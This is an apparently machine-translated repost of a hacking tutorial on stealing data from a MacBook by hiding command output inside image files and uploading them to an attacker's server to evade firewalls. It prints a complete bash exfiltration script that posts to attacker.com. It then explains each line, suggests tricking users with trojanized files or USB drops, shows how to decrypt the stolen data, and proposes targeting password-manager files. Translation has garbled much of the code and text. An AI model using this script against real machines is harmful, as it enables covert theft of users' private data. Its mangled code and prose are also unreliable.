قالب وردپرس درنا توس
Home / Tips and Tricks / Using images to smuggle data through firewalls «Null Byte :: WonderHowTo

Using images to smuggle data through firewalls «Null Byte :: WonderHowTo



Data can be quickly pasted into images without the use of metadata tools. Attackers can use this knowledge to filter sensitive information from a MacBook by sending the images to regular file-sharing sites.

We'll explore DPI work around, payload obfuscation, and the use of popular firewall bypass sites in an alternate way to embed data in images. Unlike using metadata tags to store user data in an image, this method inserts text directly into the footer of the image file.

Understanding the Attack

For this article, a simple bash script was created to illustrate how an attacker can easily proceed. Filter data in images found on a Mac target computer. The script is below and can be viewed on my GitHub.

  #! / Bin / bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

#if statement to determine if the message is an answer
# This is the command that is executed and embedded in the photo.
# Single quotes are used here to facilitate the escape of special characters
# Characters in the desired commands.
exfilData = & # 39; ls -lah "/ Users / $ USER /" & # 39;

# Where the attacker's PHP server is located. That has to be
# updated to use a public domain like Dropbox or something else
# with an official API.
exfilSite = "http://attacker.com/index.php"

# If no matching image is found on the target computer, this is
# image is downloaded and used instead. By default, that is
The # script tries to use an image already on the MacBook
# Minimize the traffic coming from the device.
tmpImage = "https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# Use the `find` command to find a suitable embedding image
# Data in. The user's home directory (~) is searched for
# first (-print -quit) JPG, JPEG or PNG smaller than 100k.
# The maximum file size and file types are somewhat arbitrary.
# The size can be increased and the file types can be extended
# to use for example MP3, PDF and MOV files.
findImage = "$ (find ~ -type f -size -100k  (-iname & # 39; * .jp * g & # 39; -o -iname & # 39; * png & # 39;  -print -quit ) "

# If the encryption option is enabled, the password is hard-coded
# in the payload for convenience, what makes it possible
# Reverse engineering and decryption of the exfiltrated data in the
# Image. This is a fast and dirty solution.
pass = "password123"

# An "if" statement to determine if a suitable PNG or JPG exists
# discovered. If not, the backup image will be downloaded
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
# Curl silently downloads (-s) the backup image and
# Save it (-o) in the directory / tmp with the file name i.jpg.
curl -s "$ tmpImage" -o "/tmp/i.jpg"
# The backup image is put into the variable exfilImage for
# later commands.
exfilImage = "/ tmp / i.jpg"
otherwise
# If a suitable image is found, the variable exfilImage
# is set for later commands.
exfilImage = "$ findImage"
fi

# It may be desirable or undesirable to encrypt the payload
# before embedding in the picture. To activate, set to "1"
# Encryption, set to "0" to disable it.
useEncrypt = & # 39; 1 & # 39;

# An if statement to determine the value of exfilType
# Variable. `1` is encrypted with openssl (LibreSSL).
# Otherwise it will not be encrypted.
if [[ "$useEncrypt" = '1' ]]; then
# OpenSSL is used to encrypt the payload output (enc)
# encrypt the encrypted data with one (-a -A)
# Password (passport).
exfilData = "$ (openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluable the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data in a new line ( n  n).
# The newlines make it easy to extract the data quickly
# after being delivered to the attacker.
printf #  n  n% s & # 39; "$ exfilData" >> "$ exfilImage"

# Curl will transfer the image to the PHP of the attacker
#server.
curl -F "image = @ $ exfilImage" "$ exfilSite" 

The script first executes any command (for example, system_profiler). The output of this command is the data that the attacker wants to filter. The script then attempts to find a JPEG or PNG image in the source directory (~ /) of the target and insert the output of the command directly into the image. The image is then immediately uploaded to a web page (the data is smuggled in), which the attacker desires.

Below is an example of a small image file opened with the text editor nano in Kali. We can see that the image produces some unusual characters because photos should not be opened with text editors.

   PNG
^ Z
^ @ ^ @ ^ @
IHDR ^ @ ^ @ ^ D ^ @ ^ @ ^ A ^ @ ^ H ^ F ^ @ ^ @ ^ @ ^ Ebk ^ @ ^ @ ^ L ^ WiCCPICC profile ^ @ ^ @ HW ^ GXS ^ V [% J A4 &% H FH ^ B% ^ T ^ T
Wp- `Y U ^ Q ^ E ^ B Z` a - ł
  7} o2? ? 3 瞹 ^ L ^ @ j T j ^ CP Q ^ R ^ cXi ^ Y, R ^ O @ ^ A ^ E (`˥ (^ @ 5 N * | _ @ (^ CA% ^ K ^ K ^ @ 6 /) ^ @ ATT f $
   _c N ^ U "^ RT # H ^ U. $ + & VB, PU" eD2 t ^ @ P / ^ O ^ Xƺ ^ B ^ H ^ P ^ GeI cT ^ Nb lq ^ XwH ^ GM ^ P + I_ Byh "İr I ^ d X $ [^ V ^ Y d L ˔y˔aɜ"! W O xG $
R ^ R @ DS ^  `wt:: B7 6` X # v ^ Pk ^ AAPa (/ y0 ^ [B gw 7 7 ^ C ^ PNS + PZ, ^ S ^ T, ^ NY  ^? (^ K ^ [^ @ 7th W ^? ^ [^ Q 6 ^ E k? $
f ^ T `^ U ^ A ^ [&
   ^ DA ^ K8 ^ @, ^ @ ^ K g ^ OV ^ @ $ 0 ^ P # ^  F ^  ^ Q ^ W ^ K GB ($ ^ AIG2 ^  D (^ Y | ^  @ j H = ^ K ^ _9 F. "7 n
   b (^ Ue 

If you scroll to the end of the same file, you will find the result of some ls and system_profiler Commands.

] ^ D ^^ & # 39;? ^? ~ P "f" c 5h ^ @ w 衇 F 衇 ^ K x2VS LP $] ^ D {hiL ^ f ia 0p ݺ uqg ^ Ha Gg @ G ^^ <9f ^ W ^ O? KH "UC <f ^?] ^ N ^ X0 d" g ^ WZ ǽt ǽ? Twu G |. YM ~ k7 C ^ N9 $ e? N ܸ ^ Bg ^ WL ^ P ^ L ^ S 7 IW ^ FV {^ ] w ʸ ~ ˤ + W ˤ ^ FN; ɐW ɐ Vg ^ _- ,, ^ L l 2 ~ v Pb $
  Xr ^ U ^ U ^ U D l ^ Z J ^ W T <�^D�a����g�c˝s�9[$�s�~��i(;gΜ�L(���^[kL�)o6m:���ܶ'��u�~��%G^q�]��mk��իW�F�^^�E�kM^O^Z��[�����^Z���d�f6J��
�4a3^B^H �^@^B^H �^@^B^H ��v" èU��^E-�Z).       ��'�#I�X��jZ']F�^?�����^?����+���ꩧ��+��'T0ǹ��^[k$��|���^[������v
 ^��m�^V�i;�v��'n�9sf��Ǯ�m�����⋷�^Ep�=۵�6�Kڥ�s���Ž�^_���������֦f����qL;9N���B{�        'l^�dI�> Gs ު 1ު 0 f̘JS g a 8 Z} V; v ݐ 6 ^ Epz O> $ 1y & # 39; : TbV9 t 
  uVd Pf MH ^ X  {q m e ^ @ * x ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H @ ^ E 3) s t1 ^ L, j EK 5 ^ {K ^ N. I <^]+^Z�^F�^[��'�3yJ^ELB�!n�@�^N��F���^\F�8Dqq�5+�tU^Nj7aG&^W���:��s]���g�]k�xA�^UW��Jp��y���X^&�h� ����*���t�^F��~����k�{�-��H@/��m� J��g�'^D^P@^@^A^D^P@^@^A^D^P@��^$
�B �{.��^P.��^^K^A^D^P@^@^A^D^P@^@^A^D^P��^EZ^S�ك�o�^L�^A^B^Ht^F�^G^^x�N�:ýr�^H �^@^B^H �^@^B^H �^@^B;�@�c��8�ʝ �^@^B^H �^@^B^H �^@^B^H �^@^B^H �> ^ B p Y ^ Q @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D: ^ @!  ^ Z * ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ @ ^ H ^ @ ^ B ^ H ^ H ^ Pμ; gE ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ $
   # ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H Q
  g @ n ݬ ݬ _ ^ _ X bE @ E "^ QH p6 ^ Eo ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P & oZ 6dȐ { ^ e ^ K 8 ^ Wc ys ^ U ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ @ ^ H ^ @ ^ B vA ӧOJ ^ @ g6j ^ E n 6 E ^ Hg $ X "^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ HQ @ + - K q
!  6) # ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H E L VUU ^ W! `^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H @ ^ [   ^Pµ^Q,�E^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@�^H^P�^Y    �^H �^@^B^H �^@^B^H �^@^B^H �^@^B^H��^@!^[�rX^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D�^@!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^$
�b���1/^S�m[c��D^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^AW�P(^Tذa��6] ~ 1 /
   J * ^ W6 + X "^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H @ ^ B p8 r J j8 m F_ dr p PW B ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ E Mö ^ K ^ W ^ F ֮] ^ [������u�n3�pR^@7/�H$f����*�� ���S�^B^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D��h ^^�^G�/_^^x��w,^P
 ^BN�9^3B����뺣$���_B�'^] x ^ @ ^ B ^ H ^ @ ^ B ^ H ^ @ ^ B ^ H @ ^ W {Qmmj
   ^ T Y [$^R      ��^Fp�μ�+��s�̙�^] S ^ _ ^? u = z X!
FC 寻 i 寻 ^ R ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ D ^ P @ ^ @ ^ A ^ DZ $ V · yR Σs Σ> * {& ^ O @ q 2 ^ @ ^ @ ^ @ ^ @ IEND B`

a total of 80
drwx ------ + 19 User Employee 608B May 3, 2:22 pm Desktop
drwxr-xr-x + 17 User 544B May 3 01:00.
-rw ------- 1 User Employee 55B May 3 01:00 .lesshst
drwx ------ 59 users Employee 1,8K May 2 23:48 .bash_sessions
-rw ------- 1 user Employee 23K May 2 22:17 .bash_history
-rw-r - r - @ 1 User Employee 8.0K May 2 22:11 .DS_Store
drwx ------ 7 user staff 224B Apr 28 06:46 .Trash
drwx ------ + 33 users Employee 1.0K Apr 26 21:33 Documents
drwx ------ @ 55 user staff 1.7K 25.04. 06:58 library
drwxr-xr-x 15 user employee 480B November 18 11:36 .atom
drwx ------ + 4 users Employees 128B 18.11. 06:32 downloads
drwx ------ 3 User Employee 96B Nov 18 05:51 .config
drwx ------ + 3 users Employee 96B October 29, 2018 Movies
drwx ------ + 3 users Employees 96B October 29, 2018 Music
drwx ------ + 3 users Employee 96B 29.10.2018 Images
drwxr-xr-x + 4 users Employees 128B 29.10.2018 Public
drwxr-xr-x 5 root admin 160B October 29, 2018 ..

firewall:

Firewall settings:

Mode: Allow all incoming connections
Firewall Logging: Yes
Stealth Mode: No 

The technical details for storing data through images are beyond the scope of this article. It is important that the data at the bottom of the picture does not damage the photo. Image viewers like Apple Preview continue to open the image without any data being recognized in the file. It also makes images an excellent transport mechanism for data exfiltration.

The script inserts data into the image file using I / O redirection. Just as it is possible to append data to a text file ( >> ), the script appends the command output to the bottom of the image file.

Why exfiltrate data in images? [19659004] The main advantage of data filtering in this way is the firewall bypass. With network-based firewall solutions, it is possible to observe every packet leaving a particular device on the network. Strict firewall policies make it difficult for an attacker to retrieve large amounts of information from the network. Smuggling data into images helps solve this problem.

Wireshark capturing an image with exfil data that is sent to any web site.

Understanding the payload [19659004] Let's break down the script line by line .

It starts with several variables that should be changed according to the scenario. The first variable determines which commands will run on the destination MacBook. The output of the command is embedded in the image file. The following example executes a simple command ls of the base directory of the target. For this variable, single quotes are used to facilitate the creation of characters. Keep this in mind when entering commands to execute.

  exfilData = & # 39; ls -lah "/ Users / $ USER /" & # 39; 

There are many places where the image can be filtered out. Websites like Dropbox and Flickr have official APIs to make uploading files as comfortable as possible for end users (and attackers). Similarly, curl can emulate POST requests and send the image to file-sharing sites and other forums. For this demonstration, we use a simple PHP server setup on the attacker's system.

  exfilSite = "http://attacker.com/index.php" 

As we will see later in the script, we try to list a usable image in which the output data is stored. However, if none are found, the script downloads the following image and uses it instead to smuggle the output data. The following URL refers to a random image in one of Apple's domains, but it can literally be any JPEG or PNG on the Internet.

  tmpImage = "https://support.apple.com/content/dam/edam/applecare/ images / en_US / repair / psp-repair_2x.png" 

The script attempts to capture an image file ( type f ), which is less than 100k . and with the file extension JPEG, JPG or PNG. The first ( -print -quit ) image within this criterion is used as the exfiltration file. The requirements for the file size are mostly arbitrary. Smaller image files speed up the upload process. These find options were mainly used to show how the criteria can be refined.

  findImage = "$ (find ~ -type f -size -100k  (-iname & # 39; * jjp * g & # 39; -o -name & # 39; * png & # 39; ) - print -quit) "

The script supports the ability to encrypt the command output data before embedding it in the image. Activate it with 1 disable it with 0 .

  useEncrypt = & # 39; 1 & # 39; 

If encryption is enabled, the password below will be used to password-protect the output data. For the sake of simplicity, it is permanently coded into the payload, which makes it possible to reverse engineer and decrypt the exfiltrated data in the image. However, it should serve as a quick and dirty solution. Public-key encryption is more useful here.

 pass = "password123" 

The rest of the script does not need to be changed. All of the above variables are hard-coded in the following sections.

Below is the first of two if statements that determine if a suitable JPEG or PNG file has been detected, and either follow them in the commands or in the variable "tmpImage" Download defined Apple image.

  if [[ ! -f "$findImage" ]]; then
curl -s "$ tmpImage" -o "/tmp/i.jpg"
exfilImage = "/ tmp / i.jpg"
otherwise
exfilImage = "$ findImage"
fi 

The second statement if uses OpenSSL (LibreSSL in macOS or Mac OS X) to encrypt the output data with the variable password $ pass . Otherwise, the output data will not be encrypted and pasted in clear text into the image.

  if [[ "$useEncrypt" = '1' ]]; then
exfilData = "$ (openssl enc -aes-256-cbc -a -A -in <(eval $ exfilData) -passpass: $ pass)"
otherwise
exfilData = "$ (eval $ exfilData)"
fi 

Here we have the I / O redirect. Printf is used to attach ( >> ) the command issued to the image file. Newlines ( n n ) are added to separate the injected data from the raw image data and to facilitate extraction in the following instructions.

  printf #  n  n% s & # 39; "$ exfilData" >> "$ exfilImage" 

Finally, the image is transferred to the attacker's server with the option -F to send the image.

  curl -F "image = @ $ exfilImage" "$ exfilSite" 

Step 1: Start the PHP server. While similar file exchange sites are ideal for this attack, I'll quickly show how a local PHP server in Kali is used to capture images the target's MacBook. This manual will be discussed in detail.

Save the following PHP code in a file named "index.php" and start the server with php -S 0.0.0.0: 80 .

   

Step 2: Deploy the Payload

There are several ways to persuade a Mac user to execute malicious code. The simplest way to compromise a goal is to manipulate it on social networks to open trojanized AppleScripts. This can be accomplished by running USB dead-drop attacks that are highly susceptible to macOS, or by remotely bypassing Gatekeeper.

Trojanized application displayed as ordinary PDF.

For more information about USB Dead Drops, see our article on hacking Wi-Fi passwords with USB Dead Drops. The focus is on compressing Windows 10 targets, but there is much talk about using USB flash drives as attack vectors.

Step 3: Access the exfiltrated data

After the PHP server has received the exfiltrated image, extract the embedded data. If payload encryption is disabled, the exfiltrated data can be easily extracted using the command tail . Change the number ( -n ) of the lines to be printed as needed.

 ~ $ tail -n 20 image.png

1 g @ n ݬ ֯_ X bE @ E "H p6o @@@@ & oZ 6dȐ {

   J * 6 + X "@ p8 r J j8 m F_ dr p PW B @@@@ MÖ  RX @@@@!` @, E @@@@!  RX @@@! `@, E @ @@ q `1
F C 寻 i 寻 @@@@ Z $ V · yR Σs Σ> * {& @ q 2 IEND B`] u n3 pR7 / H $ f * S @@@@ h / _x, w,

2 in total 80
3 drwx ------ + 19 User Employee 608B May 3, 2:22 pm Desktop
4 drwxr-xr-x + 17 User 544B May 3, 01:00.
5 -rw ------- 1 User Employee 55B May 3 01:00 .lesshst
6 drwx ------ 59 users Employee 1,8K May 2 23:48 .bash_sessions
7 -rw ------- 1 user Employee 23K May 2 22:17 .bash_history
8 -rw-r - r - @ 1 User Employee 8,0K May 2 22:11 .DS_Store
9 drwx ------ 7 user staff 224B Apr 28 06:46 .Trash
10 drwx ------ + 33 users Employee 1.0K Apr 26 21:33 Documents
11 drwx ------ @ 55 user staff 1,7K Apr 25 06:58 Library
12 drwxr-xr-x 15 user staff 480B Nov 18 11:36 .atom
13 drwx ------ + 4 users Employees 128B 18.11. 06:32 downloads
14 drwx ------ 3 User Employees 96B 18.11. 05:51 .config
15 drwx ------ + 3 users Employees 96B October 29, 2018 Movies
16 drwx ------ + 3 users Employees 96B October 29, 2018 Music
17 drwx ------ + 3 users Employee 96B October 29, 2018 Pictures
18 drwxr-xr-x + 4 users Employees 128B 29.10.2018 Public
19 drwxr-xr-x 5 root admin 160B October 29, 2018 .. 

If encryption is enabled, OpenSSL (LibreSSL) must be installed in Kali to decrypt the data. Make sure that LibreSSL version 2.8 is installed. In my test, version 2.9.x did not seem compatible with Mojave's version of LibreSSL. The data could not be decrypted.

First download the LibreSSL tarball in Kali.

 ~ $ wget # https: //ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar .gz & # 39;

--2019-04-28 21: 08: 46-- https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org) ... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org) | 129.128.5.191 |: 443 ... connected.
HTTP request sent, response expected ... 200 OK
Length: 3373599 (3.2 M) [text/plain]
Save as: "libressl-2.8.2.tar.gz"

libressl-2.8.2.tar.gz 100% [==============>] 3.22 M 255 KB / s in 25 s

2019-04-28 21:09:15 (133 KB / s) - & libressl-2.8.2.tar.gz & # 39; [3373599/3373599] 

Decompress it with the following command tar to extract ( x ) The file .gz ( z ) ( f ).

 ~ $ tar -xzf libressl - *. tar.gz

libressl-2.8.2 / m4 / check-hardening-options.m4
libressl-2.8.2 / m4 / check-libc.m4
libressl-2.8.2 / m4 / check-os-options.m4
libressl-2.8.2 / m4 / disable-compiler-warnings.m4
libressl-2.8.2 / m4 / libtool.m4

...

libressl-2.8.2 / man / tls_load_file.3
libressl-2.8.2 / man / tls_ocsp_process_response.3
libressl-2.8.2 / man / tls_read.3
libressl-2.8.2 / man / openssl.cnf.5
libressl-2.8.2 / man / x509v3.cnf.5
libressl-2.8.2 / man / Makefile.in
libressl-2.8.2 / man / CMakeLists.txt 

When done, change ( cd ) to the new libressl * / directory.

 ~ $ cd libressl - * / 

Use the ./ configure command to make sure everything is ready to build the application. The process takes a few minutes.

 ~ $ ./configure && make

Checking the build system type ... x86_64-pc-linux-gnu
Host system type is being checked ... x86_64-pc-linux-gnu
Looking for a BSD-compliant installation ... / usr / bin / install -c
Check if the build environment is ok ... yes
Looking for a thread-safe mkdir -p ... / usr / bin / mkdir -p

...

make [1]: directory & # 39; /opt/libressl-2.8.2/man&#39; to enter
make [1]: Nothing for everyone to do.
make [1]: directory & # 39; /opt/libressl-2.8.2/man&#39; leave
make [1]: directory & # 39; /opt/libressl-2.8.2&#39; to enter
make [1]: There is nothing to do for All-Am.
make [1]: Leaving the directory & # 39; /opt/libressl-2.8.2&#39; [19659006[Thenuse make install  to install the required software in the appropriate system directories. 

 ~ $ make install

make install
Make installation in crypto
make [1]: directory & # 39; /opt/libressl-2.8.2/crypto&#39; to enter
make install-am
make [2]: directory & # 39; /opt/libressl-2.8.2/crypto&#39; to enter

...

make [2]: For & # 39; install-exec-am & # 39; there is nothing to do.
/ usr / bin / mkdir -p & # 39; / usr / local / lib / pkgconfig & # 39;
/ usr / bin / install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc & # 39; / usr / local / lib / pkgconfig & # 39;
make [2]: directory & # 39; /opt/libressl-2.8.2&#39; leave
make [1]: Leaving directory & # 39; /opt/libressl-2.8.2&#39; 

Use the ldconfig command to create the required links and cache the most recent shared libraries.

 ~ $ ldconfig 

To verify that the installation was successful, use the command whereis to find the binaries openssl .

 ~ $ whereis openssl

openssl: / usr / bin / openssl / usr / local / bin / openssl /usr/share/man/man1/openssl.1ssl.gz[19659006<Thebinaryfilein/usr/local/bin/isthefirstversionandcanbecheckedwiththefollowingcommand openssl  , 

 ~ $ / usr / local / bin / openssl version

LibreSSL 2.8.2 

With the installation, the data in the image can be extracted and decrypted with the following command.

 ~ $ / usr / local / bin / openssl enc -d -aes-256-cbc -a -A passpass: password123 -in <(tail -n1 image.png)

a total of 80
drwx ------ + 19 User Employee 608B May 3, 2:22 pm Desktop
drwxr-xr-x + 17 User 544B May 3 01:00.
-rw ------- 1 User Employee 55B May 3 01:00 .lesshst
drwx ------ 59 users Employee 1,8K May 2 23:48 .bash_sessions
-rw ------- 1 user Employee 23K May 2 22:17 .bash_history
-rw-r - r - @ 1 User Employee 8.0K May 2 22:11 .DS_Store
drwx ------ 7 user staff 224B Apr 28 06:46 .Trash
drwx ------ + 33 users Employee 1.0K Apr 26 21:33 Documents
drwx ------ @ 55 user staff 1.7K 25.04. 06:58 library
drwxr-xr-x 15 user employee 480B November 18 11:36 .atom
drwx ------ + 4 users Employees 128B 18.11. 06:32 downloads
drwx ------ 3 User Employee 96B Nov 18 05:51 .config
drwx ------ + 3 users Employee 96B October 29, 2018 Movies
drwx ------ + 3 users Employees 96B October 29, 2018 Music
drwx ------ + 3 users Employee 96B 29.10.2018 Images
drwxr-xr-x + 4 users Employees 128B 29.10.2018 Public
drwxr-xr-x 5 root admin 160B October 29, 2018. 

The payload used in this article ( ls ) is an elementary example. In a real-world scenario, an attacker could design the script to find and filter out LastPass and 1Passwords data for offline brute-force attackers. Other exfiltration attacks can include cached browser passwords, terminal history, web traffic, and any data that the attacker considers stale. If all else fails, write me a message on Twitter @tokyoneon_ .

Do not miss: How to enter 1Password, KeePassX, and LastPass passwords in plain text on MacOS

Cover picture and screenshots of tokyoneon / null byte




Source link